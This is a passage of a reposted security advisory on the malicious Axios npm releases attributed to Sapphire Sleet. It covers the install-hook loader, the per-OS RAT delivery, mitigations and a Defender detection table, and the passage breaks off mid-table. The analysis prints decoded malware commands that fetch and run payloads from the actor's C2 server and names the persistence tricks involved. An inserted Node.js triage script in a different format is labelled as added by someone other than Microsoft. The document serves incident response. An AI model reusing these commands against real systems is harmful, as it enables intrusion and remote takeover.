{"id":60413,"date":"2026-04-01T21:00:00","date_gmt":"2026-04-01T21:00:00","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?p=146284"},"modified":"2026-04-01T21:00:00","modified_gmt":"2026-04-01T21:00:00","slug":"mitigating-the-axios-npm-supply-chain-compromise","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/","title":{"rendered":"Mitigating the Axios npm supply chain compromise"},"content":{"rendered":"<p class=\"wp-block-paragraph\">On March 31, 2026, two newly published versions of Axios, a popular JavaScript HTTP client with over 70 million weekly downloads, were identified as malicious. These versions (1.14.1 and 0.30.4) had a malicious dependency injected that downloads payloads from known actor command and control (C2) infrastructure. 
Microsoft Threat Intelligence has attributed this infrastructure and the Axios npm compromise to Sapphire Sleet, a North Korean state actor.<\/p>\n<p class=\"wp-block-paragraph\">Following successful connection to the malicious C2, a second-stage remote access trojan (RAT) payload was automatically deployed based on the operating system of the compromised device, including macOS, Windows, and Linux. This activity follows the pattern of recent high-profile <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/03\/24\/detecting-investigating-defending-against-trivy-supply-chain-compromise\/\">supply chain attacks<\/a>, where other adversaries poison widely adopted open-source frameworks and their distribution channels to achieve broad downstream impact.<\/p>\n<p class=\"wp-block-paragraph\">Users who have installed Axios version 1.14.1 or 0.30.4 should rotate their secrets and credentials immediately and downgrade to a safe version (1.14.0 or 0.30.3). Users should also follow the <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/04\/01\/mitigating-the-axios-npm-supply-chain-compromise\/#mitigation-and-protection-guidance\">mitigation and protection guidance<\/a> provided in this blog, including disabling auto-updates for Axios npm packages, since the malicious payload includes a hook that will continue to attempt to update.<\/p>\n<p class=\"wp-block-paragraph\">This blog shares Microsoft Threat Intelligence\u2019s findings from our analysis, <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/04\/01\/mitigating-the-axios-npm-supply-chain-compromise\/#microsoft-defender-detections\">Microsoft Defender detections<\/a> in place that alerted and protected our customers, additional protections we have implemented in our products to detect and block malicious components, and suggested mitigations for organizations to prevent further compromise.<\/p>\n<h2 class=\"wp-block-heading\" id=\"analysis-of-the-attack\">Analysis of the 
attack<\/h2>\n<p class=\"wp-block-paragraph\">On March 31, 2026, two malicious versions of the Axios npm package were released. When installed, these packages connected to a known malicious domain (C2) owned by Sapphire Sleet to retrieve a second-stage remote access trojan (RAT). Because Axios is commonly declared with a floating range, any project whose manifest allowed <em>axios@^1.14.0<\/em> or <em>axios@^0.30.0<\/em> resolved to the malicious versions on its next install or update, connected to this Sapphire Sleet C2, and downloaded the second-stage malware. Windows, macOS, and Linux systems are all targeted with platform-specific payloads.<\/p>\n<p class=\"wp-block-paragraph\">Microsoft Threat Intelligence has determined that the account that created the <em>plain-crypto-js<\/em> package is associated with Sapphire Sleet infrastructure. That account has been disabled.<\/p>\n<h3 class=\"wp-block-heading\" id=\"silent-install-time-code-execution-using-dependency-insertion\">Silent install-time code execution using dependency insertion<\/h3>\n<p class=\"wp-block-paragraph\">The updated versions of Axios add <em>plain-crypto-js@4.2.1<\/em>, a fake runtime dependency whose install lifecycle script runs automatically during installation with no user interaction required. The trusted package\u2019s application logic is not modified; instead, the threat actor added a dependency that is never imported by the package\u2019s runtime code and exists only to trigger an install-time script that downloads the second-stage RAT. Normal application behavior therefore remains unchanged while the malicious activity happens during <em>npm install<\/em> or <em>npm update<\/em> on developer endpoints and continuous integration and continuous delivery (CI\/CD) systems.<\/p>\n<p class=\"wp-block-paragraph\">The dependency was first seeded as a clean release (<em>plain-crypto-js@4.2.0<\/em>) to establish publishing history and reduce scrutiny. 
A follow\u2011up release adds the malicious install-time logic (<em>plain-crypto-js@4.2.1<\/em>), introducing an install hook that runs <em>node setup.js<\/em> and includes a clean manifest stub (<em>package.md<\/em>) intended for later replacement.&nbsp;<\/p>\n<p class=\"wp-block-paragraph\">Two Axios releases are then published with a surgical manifest-only change: <em>axios@1.14.1<\/em> and <em>axios@0.30.4<\/em> add <em>plain-crypto-js@^4.2.1<\/em> as a dependency while leaving Axios source code unchanged. The publication metadata differs from the project\u2019s normal CI-backed publishing pattern (for example, missing trusted publisher binding and missing corresponding repo tag\/commit trail for the malicious version).&nbsp;<\/p>\n<h3 class=\"wp-block-heading\" id=\"execution-on-compromised-environments\">Execution on compromised environments<\/h3>\n<p class=\"wp-block-paragraph\">The first-stage loader (<em>setup.js<\/em>) uses layered obfuscation to reconstruct sensitive strings (module names, platform identifiers, file paths, and command templates) at runtime. A developer or CI job runs <em>npm install axios<\/em> (or a dependency install\/update that resolves to the affected versions). 
The package manager resolves and installs the injected dependency (<em>plain-crypto-js@4.2.1<\/em>).<\/p>\n<p class=\"wp-block-paragraph\">During installation, the dependency\u2019s lifecycle script automatically launches <em>node setup.js<\/em> (no additional user step required), which decodes the embedded strings at runtime, identifies the platform, and connects to <em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em> to fetch the next stage.<\/p>\n<h3 class=\"wp-block-heading\" id=\"single-endpoint-c2-with-os-specific-responses\">Single endpoint C2 with OS-specific responses<\/h3>\n<p class=\"wp-block-paragraph\">The loader connects to a Sapphire Sleet-owned domain (<em>sfrclak[.]com<\/em>) and fetches the second-stage payload from an actor-controlled server listening on port 8000. The associated IP address (142.11.206[.]73) is tied to Hostwinds, a virtual private server (VPS) provider that Sapphire Sleet is known to use when establishing C2.<\/p>\n<p class=\"wp-block-paragraph\">All platforms connect to the same resource over the same path (<em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em>); the OS selection is conveyed in the POST body (<em>packages.npm.org\/product0<\/em>, <em>product1<\/em>, or <em>product2<\/em>). This lets the operator serve platform-specific payloads from one route while keeping the client-side logic minimal, and it means the URL alone does not reveal which payload a host received. On Windows, the malicious package drops a VBScript stager. 
On macOS, the malicious package drops a native binary.<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">macOS: packages.npm.org\/product0<\/li>\n<li class=\"wp-block-list-item\">Windows: packages.npm.org\/product1<\/li>\n<li class=\"wp-block-list-item\">Linux\/other: packages.npm.org\/product2<\/li>\n<\/ul>\n<h3 class=\"wp-block-heading\" id=\"second-stage-delivery-and-execution-mechanics-by-os\">Second-stage delivery and execution mechanics by OS<\/h3>\n<h4 class=\"wp-block-heading\" id=\"macos-darwin\">macOS (Darwin)<\/h4>\n<p class=\"wp-block-paragraph\">On macOS, the RAT is a native binary: <em>com.apple.act.mond<\/em>.<\/p>\n<p class=\"wp-block-paragraph\"><em>setup.js<\/em> writes an AppleScript into a temp location and runs it silently using <em>nohup osascript \u2026 &amp;<\/em>. The AppleScript POSTs <em>packages.npm.org\/product0<\/em> to <em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em>, downloads a binary to <em>\/Library\/Caches\/com.apple.act.mond<\/em>, applies <em>chmod 770<\/em>, then starts it using <em>\/bin\/zsh<\/em> in the background.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nnode setup.js\n\u2514\u2500 sh -c 'curl -o \/Library\/Caches\/com.apple.act.mond\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\">The AppleScript is removed afterward; the durable artifact is typically <em>\/Library\/Caches\/com.apple.act.mond<\/em>.<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">SHA-256: 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a<\/li>\n<\/ul>\n<p class=\"wp-block-paragraph\">Observed macOS command (as decoded):<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"9\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nsh -c 'curl -o 
\/Library\/Caches\/com.apple.act.mond -d packages.npm.org\/product0 -s hxxp:\/\/sfrclak[.]com:8000\/6202033 &amp;&amp; chmod 770 \/Library\/Caches\/com.apple.act.mond &amp;&amp; \/bin\/zsh -c \"\/Library\/Caches\/com.apple.act.mond hxxp:\/\/sfrclak[.]com:8000\/6202033 &amp;\" &amp;&gt; \/dev\/null'\n<\/pre>\n<\/div>\n<h4 class=\"wp-block-heading\" id=\"windows\">Windows<\/h4>\n<p class=\"wp-block-paragraph\">On Windows, the RAT is a PowerShell script: <em>6202033.ps1<\/em>.<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">SHA-256: ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c<\/li>\n<li class=\"wp-block-list-item\">SHA-256: 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101<\/li>\n<\/ul>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nnode.exe setup.js                 \u2190 npm post-install hook\n\u2514\u2500 drops: %TEMP%\\6202033.vbs   \u2190 VBScript stager\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\">On first execution, the PowerShell RAT creates <em>%PROGRAMDATA%\\system.bat<\/em> and adds a registry Run key at <em>HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate<\/em> so that the RAT is fetched again after every reboot; this Run key is the persistence mechanism to remove during cleanup.<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">SHA-256: f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd<\/li>\n<\/ul>\n<p class=\"wp-block-paragraph\">The chain locates PowerShell (using <em>where powershell<\/em>), then copies it to <em>%PROGRAMDATA%\\wt.exe<\/em>, a benign-looking name (that of the Windows Terminal executable). 
It writes a VBScript in <em>%TEMP%<\/em> and runs it using <em>cscript \/\/nologo<\/em> to keep user-facing windows hidden.<\/p>\n<p class=\"wp-block-paragraph\">The VBScript launches a hidden <em>cmd.exe<\/em> to POST <em>packages.npm.org\/product1<\/em> to <em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em>, saves the response to a temporary <em>.ps1<\/em>, executes it with a hidden window and execution-policy bypass (<em>-w hidden -ep bypass<\/em>), then deletes the <em>.ps1<\/em>.<\/p>\n<p class=\"wp-block-paragraph\">The temporary <em>.vbs<\/em> is also removed; the durable artifact is often <em>%PROGRAMDATA%\\wt.exe<\/em>.<\/p>\n<p class=\"wp-block-paragraph\">Observed Windows command (as decoded; <em>&lt;user&gt;<\/em> stands for the profile name):<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"10\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n\"cmd.exe\" \/c curl -s -X POST -d \"packages.npm.org\/product1\" \"hxxp:\/\/sfrclak[.]com:8000\/6202033\" &gt; \"C:\\Users\\&lt;user&gt;\\AppData\\Local\\Temp\\6202033.ps1\" &amp; \"C:\\ProgramData\\wt.exe\" -w hidden -ep bypass -file \"C:\\Users\\&lt;user&gt;\\AppData\\Local\\Temp\\6202033.ps1\" \"hxxp:\/\/sfrclak[.]com:8000\/6202033\" &amp; del \"C:\\Users\\&lt;user&gt;\\AppData\\Local\\Temp\\6202033.ps1\" \/f\n<\/pre>\n<\/div>\n<h4 class=\"wp-block-heading\" id=\"linux-others\">Linux\/others<\/h4>\n<p class=\"wp-block-paragraph\">On Linux, the RAT is a Python payload: <em>ld.py<\/em>.<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">SHA-256: fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf<\/li>\n<\/ul>\n<p class=\"wp-block-paragraph\">A Python payload is written to <em>\/tmp\/ld.py<\/em> and launched detached using <em>nohup python3 \u2026 &amp;<\/em>, with output suppressed (<em>&gt; \/dev\/null 2&gt;&amp;1<\/em>).<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nnode setup.js\n\u2514\u2500 \/bin\/sh -c \"curl -o \/tmp\/ld.py\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\"><em>setup.js<\/em> executes a shell one-liner to POST <em>packages.npm.org\/product2<\/em> to <em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em>.<\/p>\n<p class=\"wp-block-paragraph\">The response is saved as <em>\/tmp\/ld.py<\/em> and executed in the background using <em>nohup python3 \/tmp\/ld.py hxxp:\/\/sfrclak[.]com:8000\/6202033 \u2026 &amp;<\/em>.<\/p>\n<p class=\"wp-block-paragraph\"><em>\/tmp\/ld.py<\/em> remains a key on-disk indicator in typical flows.<\/p>\n<p class=\"wp-block-paragraph\">Observed Linux\/Unix command (as decoded):<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"8\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n\/bin\/sh -c \"curl -o \/tmp\/ld.py -d packages.npm.org\/product2 -s hxxp:\/\/sfrclak[.]com:8000\/6202033 &amp;&amp; nohup python3 \/tmp\/ld.py hxxp:\/\/sfrclak[.]com:8000\/6202033 &gt; \/dev\/null 2&gt;&amp;1 &amp;\"\n<\/pre>\n<\/div>\n<h3 class=\"wp-block-heading\" id=\"post-execution-defense-evasion\">Post-execution defense evasion<\/h3>\n<p class=\"wp-block-paragraph\">After launching the second-stage payload, the installer logic deletes its own loader (<em>setup.js<\/em>) and the manifest (<em>package.json<\/em>) that contained the install trigger.<\/p>\n<p class=\"wp-block-paragraph\">It then renames <em>package.md<\/em> to <em>package.json<\/em>, leaving behind a clean-looking manifest to reduce the chance that post-incident inspection of <em>node_modules<\/em> reveals the original install hook. Responders should therefore not treat the absence of an install script in <em>node_modules\/plain-crypto-js<\/em> as evidence that the hook never ran; the lockfile, npm logs, and the on-disk artifacts listed above are the more reliable records.<\/p>\n<h3 class=\"wp-block-heading\" id=\"rat-deployment-as-covert-remote-management\">RAT deployment as covert remote management<\/h3>\n<p class=\"wp-block-paragraph\">The Windows RAT is a PowerShell script that functions as a covert remote management component designed to persist on 
Windows systems and maintain continuous contact with an external command server. When executed, it generates a unique host identifier, collects detailed system and hardware information (including OS version, boot time, installed hardware, and running processes), and establishes persistence by creating a hidden startup entry that re-launches the script at user sign in under the guise of a legitimate update process.<\/p>\n<p class=\"wp-block-paragraph\">The RAT communicates with the remote server using periodic, encoded HTTP POST requests that blend in with benign traffic patterns, initially sending host inventory and then polling for follow\u2011on instructions. Supported commands allow the remote threat actor to execute arbitrary PowerShell code, enumerate files and directories across the system, inject additional binary payloads directly into memory, or terminate execution on demand. To reduce forensic visibility, the script favors in\u2011memory execution, temporary files, and Base64\u2011encoded payloads, enabling flexible control of the compromised system while minimizing on\u2011disk artifacts.<\/p>\n<h3 class=\"wp-block-heading\" id=\"who-is-sapphire-sleet\">Who is Sapphire Sleet?<\/h3>\n<p class=\"wp-block-paragraph\">Sapphire Sleet is a North Korean state actor that has been active since at least March 2020. The threat actor focuses primarily on the finance sector, including cryptocurrency, venture capital, and blockchain organizations. These targets are often global, with a particular interest in the United States, as well as countries in Asia and the Middle East. 
The primary motivation of this actor is to steal cryptocurrency wallets to generate revenue, and target technology or intellectual property related to cryptocurrency trading and blockchain platforms.<\/p>\n<p class=\"wp-block-paragraph\">Sapphire Sleet often leverages social networking sites, such as LinkedIn, to initiate contact by directing users to click links, leading to malicious files hosted on attacker-controlled cloud storage services such as OneDrive or Google Drive, using domains masquerading as financial institutions like United States-based banks or cryptocurrency pages, and fraudulent meeting links that impersonate legitimate video conferencing applications, such as Zoom. Sapphire Sleet overlaps with activity tracked by other security vendors as UNC1069, STARDUST CHOLLIMA, Alluring Pisces, BlueNoroff, CageyChameleon, or CryptoCore.<\/p>\n<h2 class=\"wp-block-heading\" id=\"mitigation-and-protection-guidance\">Mitigation and protection guidance<\/h2>\n<p class=\"wp-block-paragraph\">In organizations where the security posture of npm packages might require review of updates prior to deployment, disabling auto-upgrade features is strongly encouraged. In <em>package.json<\/em>, <strong>remove use of caret (<\/strong><strong>^)<\/strong><strong> or tilde (~) <\/strong>which allow auto-upgrade of any minor or patch update up to a major version. 
Instead, use an exact version and handle upgrades manually.<\/p>\n<h3 class=\"wp-block-heading\" id=\"what-to-do-now-if-you-re-affected\">What to do now if you\u2019re affected<\/h3>\n<p class=\"wp-block-paragraph\">For organizations affected by this attack, Microsoft Threat Intelligence recommends the following steps:<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Roll back all deployments of Axios to safe versions (1.14.0 or 0.30.3, or earlier).<\/li>\n<li class=\"wp-block-list-item\">Use overrides to force pinned versions for transitive dependencies.<\/li>\n<li class=\"wp-block-list-item\">Flush the local cache with \u201c<em>npm cache clean --force<\/em>\u201d.<\/li>\n<li class=\"wp-block-list-item\">Disable or restrict automated dependency bots for critical packages.<\/li>\n<li class=\"wp-block-list-item\">Adopt Trusted Publishing with OIDC to eliminate stored credentials.<\/li>\n<li class=\"wp-block-list-item\">Review your CI\/CD pipeline logs for any <em>npm install<\/em> executions that might have updated to axios@1.14.1 or axios@0.30.4, and for the presence of <em>plain-crypto-js<\/em> in your <em>npm install<\/em> or <em>npm ci<\/em> output.<\/li>\n<li class=\"wp-block-list-item\">Look for outbound connections in network egress traffic to <em>sfrclak[.]com<\/em> or 142.11.206[.]73 on port 8000.<\/li>\n<li class=\"wp-block-list-item\">Developer machines: search home directories for any <em>node_modules<\/em> folder containing <em>plain-crypto-js<\/em>, axios@1.14.1, or axios@0.30.4.<\/li>\n<li class=\"wp-block-list-item\">Rotate all secrets and credentials that were exposed to compromised systems.<\/li>\n<li class=\"wp-block-list-item\">When possible, ignore postinstall scripts. 
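<\/li>
<\/ul>
<p class=\"wp-block-paragraph\">The checks in the list above (searching the lockfile and <em>node_modules<\/em> for <em>plain-crypto-js<\/em> and the two malicious Axios versions, replacing floating ranges with exact pins, forcing transitive copies through overrides) can be scripted, and the defense-evasion behavior described earlier (the loader deletes its install hook from <em>node_modules<\/em> after it runs) is the reason the lockfile, not the installed tree, is the better record. The following Node.js script is an added example written for this article, not code from Microsoft or the Axios project. The package names and version numbers come from the advisory; the semver handling covers only exact pins and npm\u2019s default caret and tilde ranges, and the sample manifest and lockfile at the bottom are constructed for illustration.<\/p>

```javascript
// Added example (not the advisory's code): triage helper that checks a project's
// package.json and package-lock.json for the Axios compromise. Package names, versions
// and the lockfile "hasInstallScript" field are real; the sample data below is constructed.
const MALICIOUS_AXIOS = new Set(["1.14.1", "0.30.4"]);   // releases named in the advisory
const INJECTED_DEP = "plain-crypto-js";                   // dependency carrying the install hook
const SAFE_PIN_BY_MAJOR = { 1: "1.14.0", 0: "0.30.3" };   // last clean release per line
const DEP_FIELDS = ["dependencies", "devDependencies", "optionalDependencies"];

// Minimal semver: exact pins plus npm's default ^ and ~ ranges on MAJOR.MINOR.PATCH.
const parseVer = (s) => { const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(s).trim()); return m ? m.slice(1, 4).map(Number) : null; };
const cmp = (a, b) => a[0] - b[0] || a[1] - b[1] || a[2] - b[2];
// Exclusive upper bound a ^ or ~ range can float to, per npm semantics.
function upperBound(range) {
  const b = parseVer(range.slice(1));
  if (range[0] === "~") return [b[0], b[1] + 1, 0];
  if (b[0] > 0) return [b[0] + 1, 0, 0];   // ^1.14.0 -> <2.0.0
  if (b[1] > 0) return [0, b[1] + 1, 0];   // ^0.30.0 -> <0.31.0
  return [0, 0, b[2] + 1];                 // ^0.0.3  -> <0.0.4
}
// Can `range` resolve to `version`? Unmodelled syntax (>=, x, *, ||, dist-tags) counts as floating.
function rangeAllows(range, version) {
  const v = parseVer(version), r = String(range).trim();
  if (!v) return false;
  if (/^v?\d+\.\d+\.\d+$/.test(r)) return cmp(parseVer(r), v) === 0;
  if (/^[\^~]\d+\.\d+\.\d+$/.test(r)) return cmp(v, parseVer(r.slice(1))) >= 0 && cmp(v, upperBound(r)) < 0;
  return true;
}

// Known-bad lockfile entries. v2/v3 lockfiles have a flat "packages" map keyed by path; v1 (and v2,
// for compatibility) nest "dependencies", so only one form is walked. npm records "hasInstallScript"
// when it resolves a package with an install hook; the loader's node_modules clean-up does not touch it.
function lockfileFindings(lock) {
  const hits = [];
  const check = (name, { version, hasInstallScript }, where) => {
    if (name === INJECTED_DEP) hits.push({ name, version, where, reason: "injected dependency" });
    if (name === "axios" && MALICIOUS_AXIOS.has(version)) hits.push({ name, version, where, reason: "malicious release" });
    if (hasInstallScript) hits.push({ name, version, where, reason: "install-time script" });
  };
  if (lock.packages) {
    for (const [p, meta] of Object.entries(lock.packages)) {
      if (p !== "") check(meta.name || p.slice(p.lastIndexOf("node_modules/") + 13), meta, p); // "" is the root
    }
    return hits;
  }
  const walk = (deps, prefix) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      check(name, meta, `${prefix}node_modules/${name}`);
      walk(meta.dependencies, `${prefix}node_modules/${name}/`);
    }
  };
  walk(lock.dependencies, "");
  return hits;
}

// package.json ranges that could pull a malicious axios on the next install or update.
function manifestFindings(pkg) {
  const hits = [];
  for (const field of DEP_FIELDS) {
    for (const [name, range] of Object.entries(pkg[field] || {})) {
      if (name === INJECTED_DEP) hits.push({ field, name, range, reason: "injected dependency" });
      if (name !== "axios") continue;
      for (const bad of MALICIOUS_AXIOS) {
        if (rangeAllows(range, bad)) hits.push({ field, name, range, reason: `can resolve to ${bad}` });
      }
    }
  }
  return hits;
}
// Rewrite the manifest as the advisory recommends: exact pin on the last clean release of the same
// line plus an "overrides" entry for transitive copies. Lines not covered are left for manual review.
function pinAxios(pkg, lockHits = []) {
  const fixed = JSON.parse(JSON.stringify(pkg));
  const safeFor = (v) => { const p = parseVer(String(v).replace(/^[\^~]/, "")); return (p && SAFE_PIN_BY_MAJOR[p[0]]) || null; };
  let pin = null;
  for (const field of DEP_FIELDS) {
    const safe = fixed[field] && fixed[field].axios ? safeFor(fixed[field].axios) : null;
    if (safe) { fixed[field].axios = safe; pin = pin || safe; }
  }
  for (const h of lockHits) if (h.name === "axios") pin = pin || safeFor(h.version);
  if (pin) fixed.overrides = Object.assign({}, fixed.overrides, { axios: pin });
  return fixed;
}
function triage(pkg, lock) {
  const lockHits = lockfileFindings(lock);
  return { lockHits, manifestHits: manifestFindings(pkg), fixedManifest: pinAxios(pkg, lockHits) };
}

// Constructed sample: a project floating on ^1.14.0 whose lockfile already resolved to the
// malicious release and pulled in the injected dependency (jest stands in for a clean package).
const SAMPLE_PKG = { name: "demo", dependencies: { axios: "^1.14.0" }, devDependencies: { jest: "~29.7.0" } };
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  "": { name: "demo" },
  "node_modules/axios": { version: "1.14.1", dependencies: { "plain-crypto-js": "^4.2.1" } },
  "node_modules/plain-crypto-js": { version: "4.2.1", hasInstallScript: true },
  "node_modules/jest": { version: "29.7.0" },
} };
if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(triage(SAMPLE_PKG, SAMPLE_LOCK), null, 2));
}
```

<p class=\"wp-block-paragraph\">Running the file with <em>node<\/em> prints the report for the constructed sample. For a real project, parse its <em>package.json<\/em> and <em>package-lock.json<\/em> with <em>JSON.parse<\/em> and pass the objects to <em>triage()<\/em>; the <em>fixedManifest<\/em> it returns is what to write back once the rollback is done. A range that can still float is reported even when the lockfile currently pins a clean version, because the next <em>npm update<\/em> or a dependency bot would move it. A clean manifest is not a clean bill of health on its own, so the on-disk artifacts and network indicators listed in this article still need to be checked.<\/p>
<ul class=\"wp-block-list\">
<li class=\"wp-block-list-item\">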
If the scenario allows, use \u201c<em>npm ci --ignore-scripts<\/em>\u201d to prevent install hooks from running, or disable them by default with \u201c<em>npm config set ignore-scripts true<\/em>\u201d. Note that this also skips the install scripts of legitimate packages that rely on them (for example, native add-ons), so verify the build afterward.<\/li>\n<li class=\"wp-block-list-item\">Remove all Axios files\/code from the victim systems and re-install cleanly.<\/li>\n<\/ul>\n<h3 class=\"wp-block-heading\" id=\"defending-against-the-axios-supply-chain-attack\">Defending against the Axios supply chain attack<\/h3>\n<p class=\"wp-block-paragraph\">Microsoft Threat Intelligence recommends the following mitigation measures to protect organizations against this threat.<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Fully stop Axios from being upgraded unless you explicitly choose to upgrade \u2013 In <em>package.json<\/em>, remove ^ or ~ (which allow auto-upgrade of any minor or patch update) and use an exact version. <em><u>NOTE: With this change, versions never upgrade unless you change them manually:<\/u><\/em><\/li>\n<\/ul>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n{\n  \"dependencies\": {\n    \"axios\": \"1.14.0\"\n  }\n}\n<\/pre>\n<\/div>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Block Axios upgrades even if a transitive dependency tries \u2013 If Axios appears indirectly, force a version using overrides (supported since npm 8.3). This forces all dependencies to use the pinned version, which is especially useful during a security incident. 
<em><u>NOTE: With this change, versions never upgrade unless you change them manually:<\/u><\/em><\/li>\n<\/ul>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n{\n  \"overrides\": {\n    \"axios\": \"1.14.0\"\n  }\n}\n<\/pre>\n<\/div>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Disable automated dependency bots (such as Dependabot or Renovate) for Axios, or restrict their updates in their config, to prevent PR\u2011based auto\u2011updates, which are often mistaken for npm behavior:<\/li>\n<\/ul>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n# Dependabot example (inside an updates: entry of .github\/dependabot.yml)\nignore:\n  - dependency-name: \"axios\"\n<\/pre>\n<\/div>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Check for malicious Axios versions in the organization to ensure that workflows and systems don\u2019t use the compromised Axios versions (1.14.1 and 0.30.4).<\/li>\n<li class=\"wp-block-list-item\">Assess the potential blast radius from affected endpoints\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">The Exposure Management graph provides a unified representation of organizational assets and their relationships, including identities, endpoints, cloud resources, and secrets. This graph is also exposed to customers through Advanced Hunting in Microsoft Defender, enabling programmatic exploration of these connections.<\/li>\n<li class=\"wp-block-list-item\">Using advanced hunting, security teams can query this graph to assess the potential blast radius of any given node, such as a server affected by the RAT. 
By understanding which assets are reachable through existing permissions and trust relationships, organizations can prioritize remediation of the most critical exposure paths.<\/li>\n<li class=\"wp-block-list-item\">Additional examples and query patterns are available here as well as in the hunting queries section.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h2 class=\"wp-block-heading\" id=\"microsoft-defender-detections\">Microsoft Defender detections<\/h2>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.microsoft.com\/security\/business\/microsoft-defender\">Microsoft Defender<\/a> customers can refer to the list of applicable detections below. Durable detections that were already in place alerted and protected customers from this attack. We have also released additional protections to detect and block specific malicious components.<\/p>\n<p class=\"wp-block-paragraph\">Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.<\/p>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"43.5\">\n<tr readability=\"5\">\n<td><strong>Tactic<\/strong>\u202f<\/td>\n<td><strong>Observed activity<\/strong><strong>\u202f<\/strong><\/td>\n<td><strong>Microsoft Defender coverage<\/strong>&nbsp;(Blocking&nbsp;detections&nbsp;are&nbsp;indicated where applicable and mapped to specific IoCs, components,&nbsp;or TTPs.)<\/td>\n<\/tr>\n<tr readability=\"7\">\n<td rowspan=\"4\">Initial Access, Execution<\/td>\n<td>The&nbsp;postinstall&nbsp;script downloads the payload from the attacker-controlled server.<\/td>\n<td><strong>Microsoft Defender for Cloud&nbsp;<\/strong><br \/>\u2013 Malicious Axios supply chain activity detected&nbsp;<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td>Initial execution script&nbsp;was&nbsp;included in&nbsp;<em>setup.js \u2013 
plain-crypto-js-4.2.1.tgz<\/em>&nbsp;and&nbsp;is responsible for launching the malicious chain during install or first run<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong> <br \/>\u2013&nbsp;Trojan:Script\/SuspObfusRAT.A&nbsp;<br \/>(Blocking)<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td>Initial execution script&nbsp;<em>setup.js<\/em>&nbsp;was responsible for&nbsp;launching the malicious chain during install or first run<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong><br \/>\u2013 TrojanDownloader:JS\/Crosdomd.A (Blocking)<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td>Maliciously packaged crypto library&nbsp;<em>plain-crypto-js@4.2.1<\/em>&nbsp;used to execute or support attacker\u2011controlled logic in a supply\u2011chain compromise.&nbsp;&nbsp;<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong> <br \/>\u2013&nbsp;Trojan:JS\/AxioRAT.DA!MTB&nbsp;(Blocking)&nbsp; &nbsp;<\/td>\n<\/tr>\n<tr readability=\"8\">\n<td rowspan=\"2\">&nbsp; Execution (macOS)<\/td>\n<td>macOS persistence <em>artifact&nbsp;\/Library\/Caches\/com.apple.act.mond<\/em>&nbsp;launched, masquerading 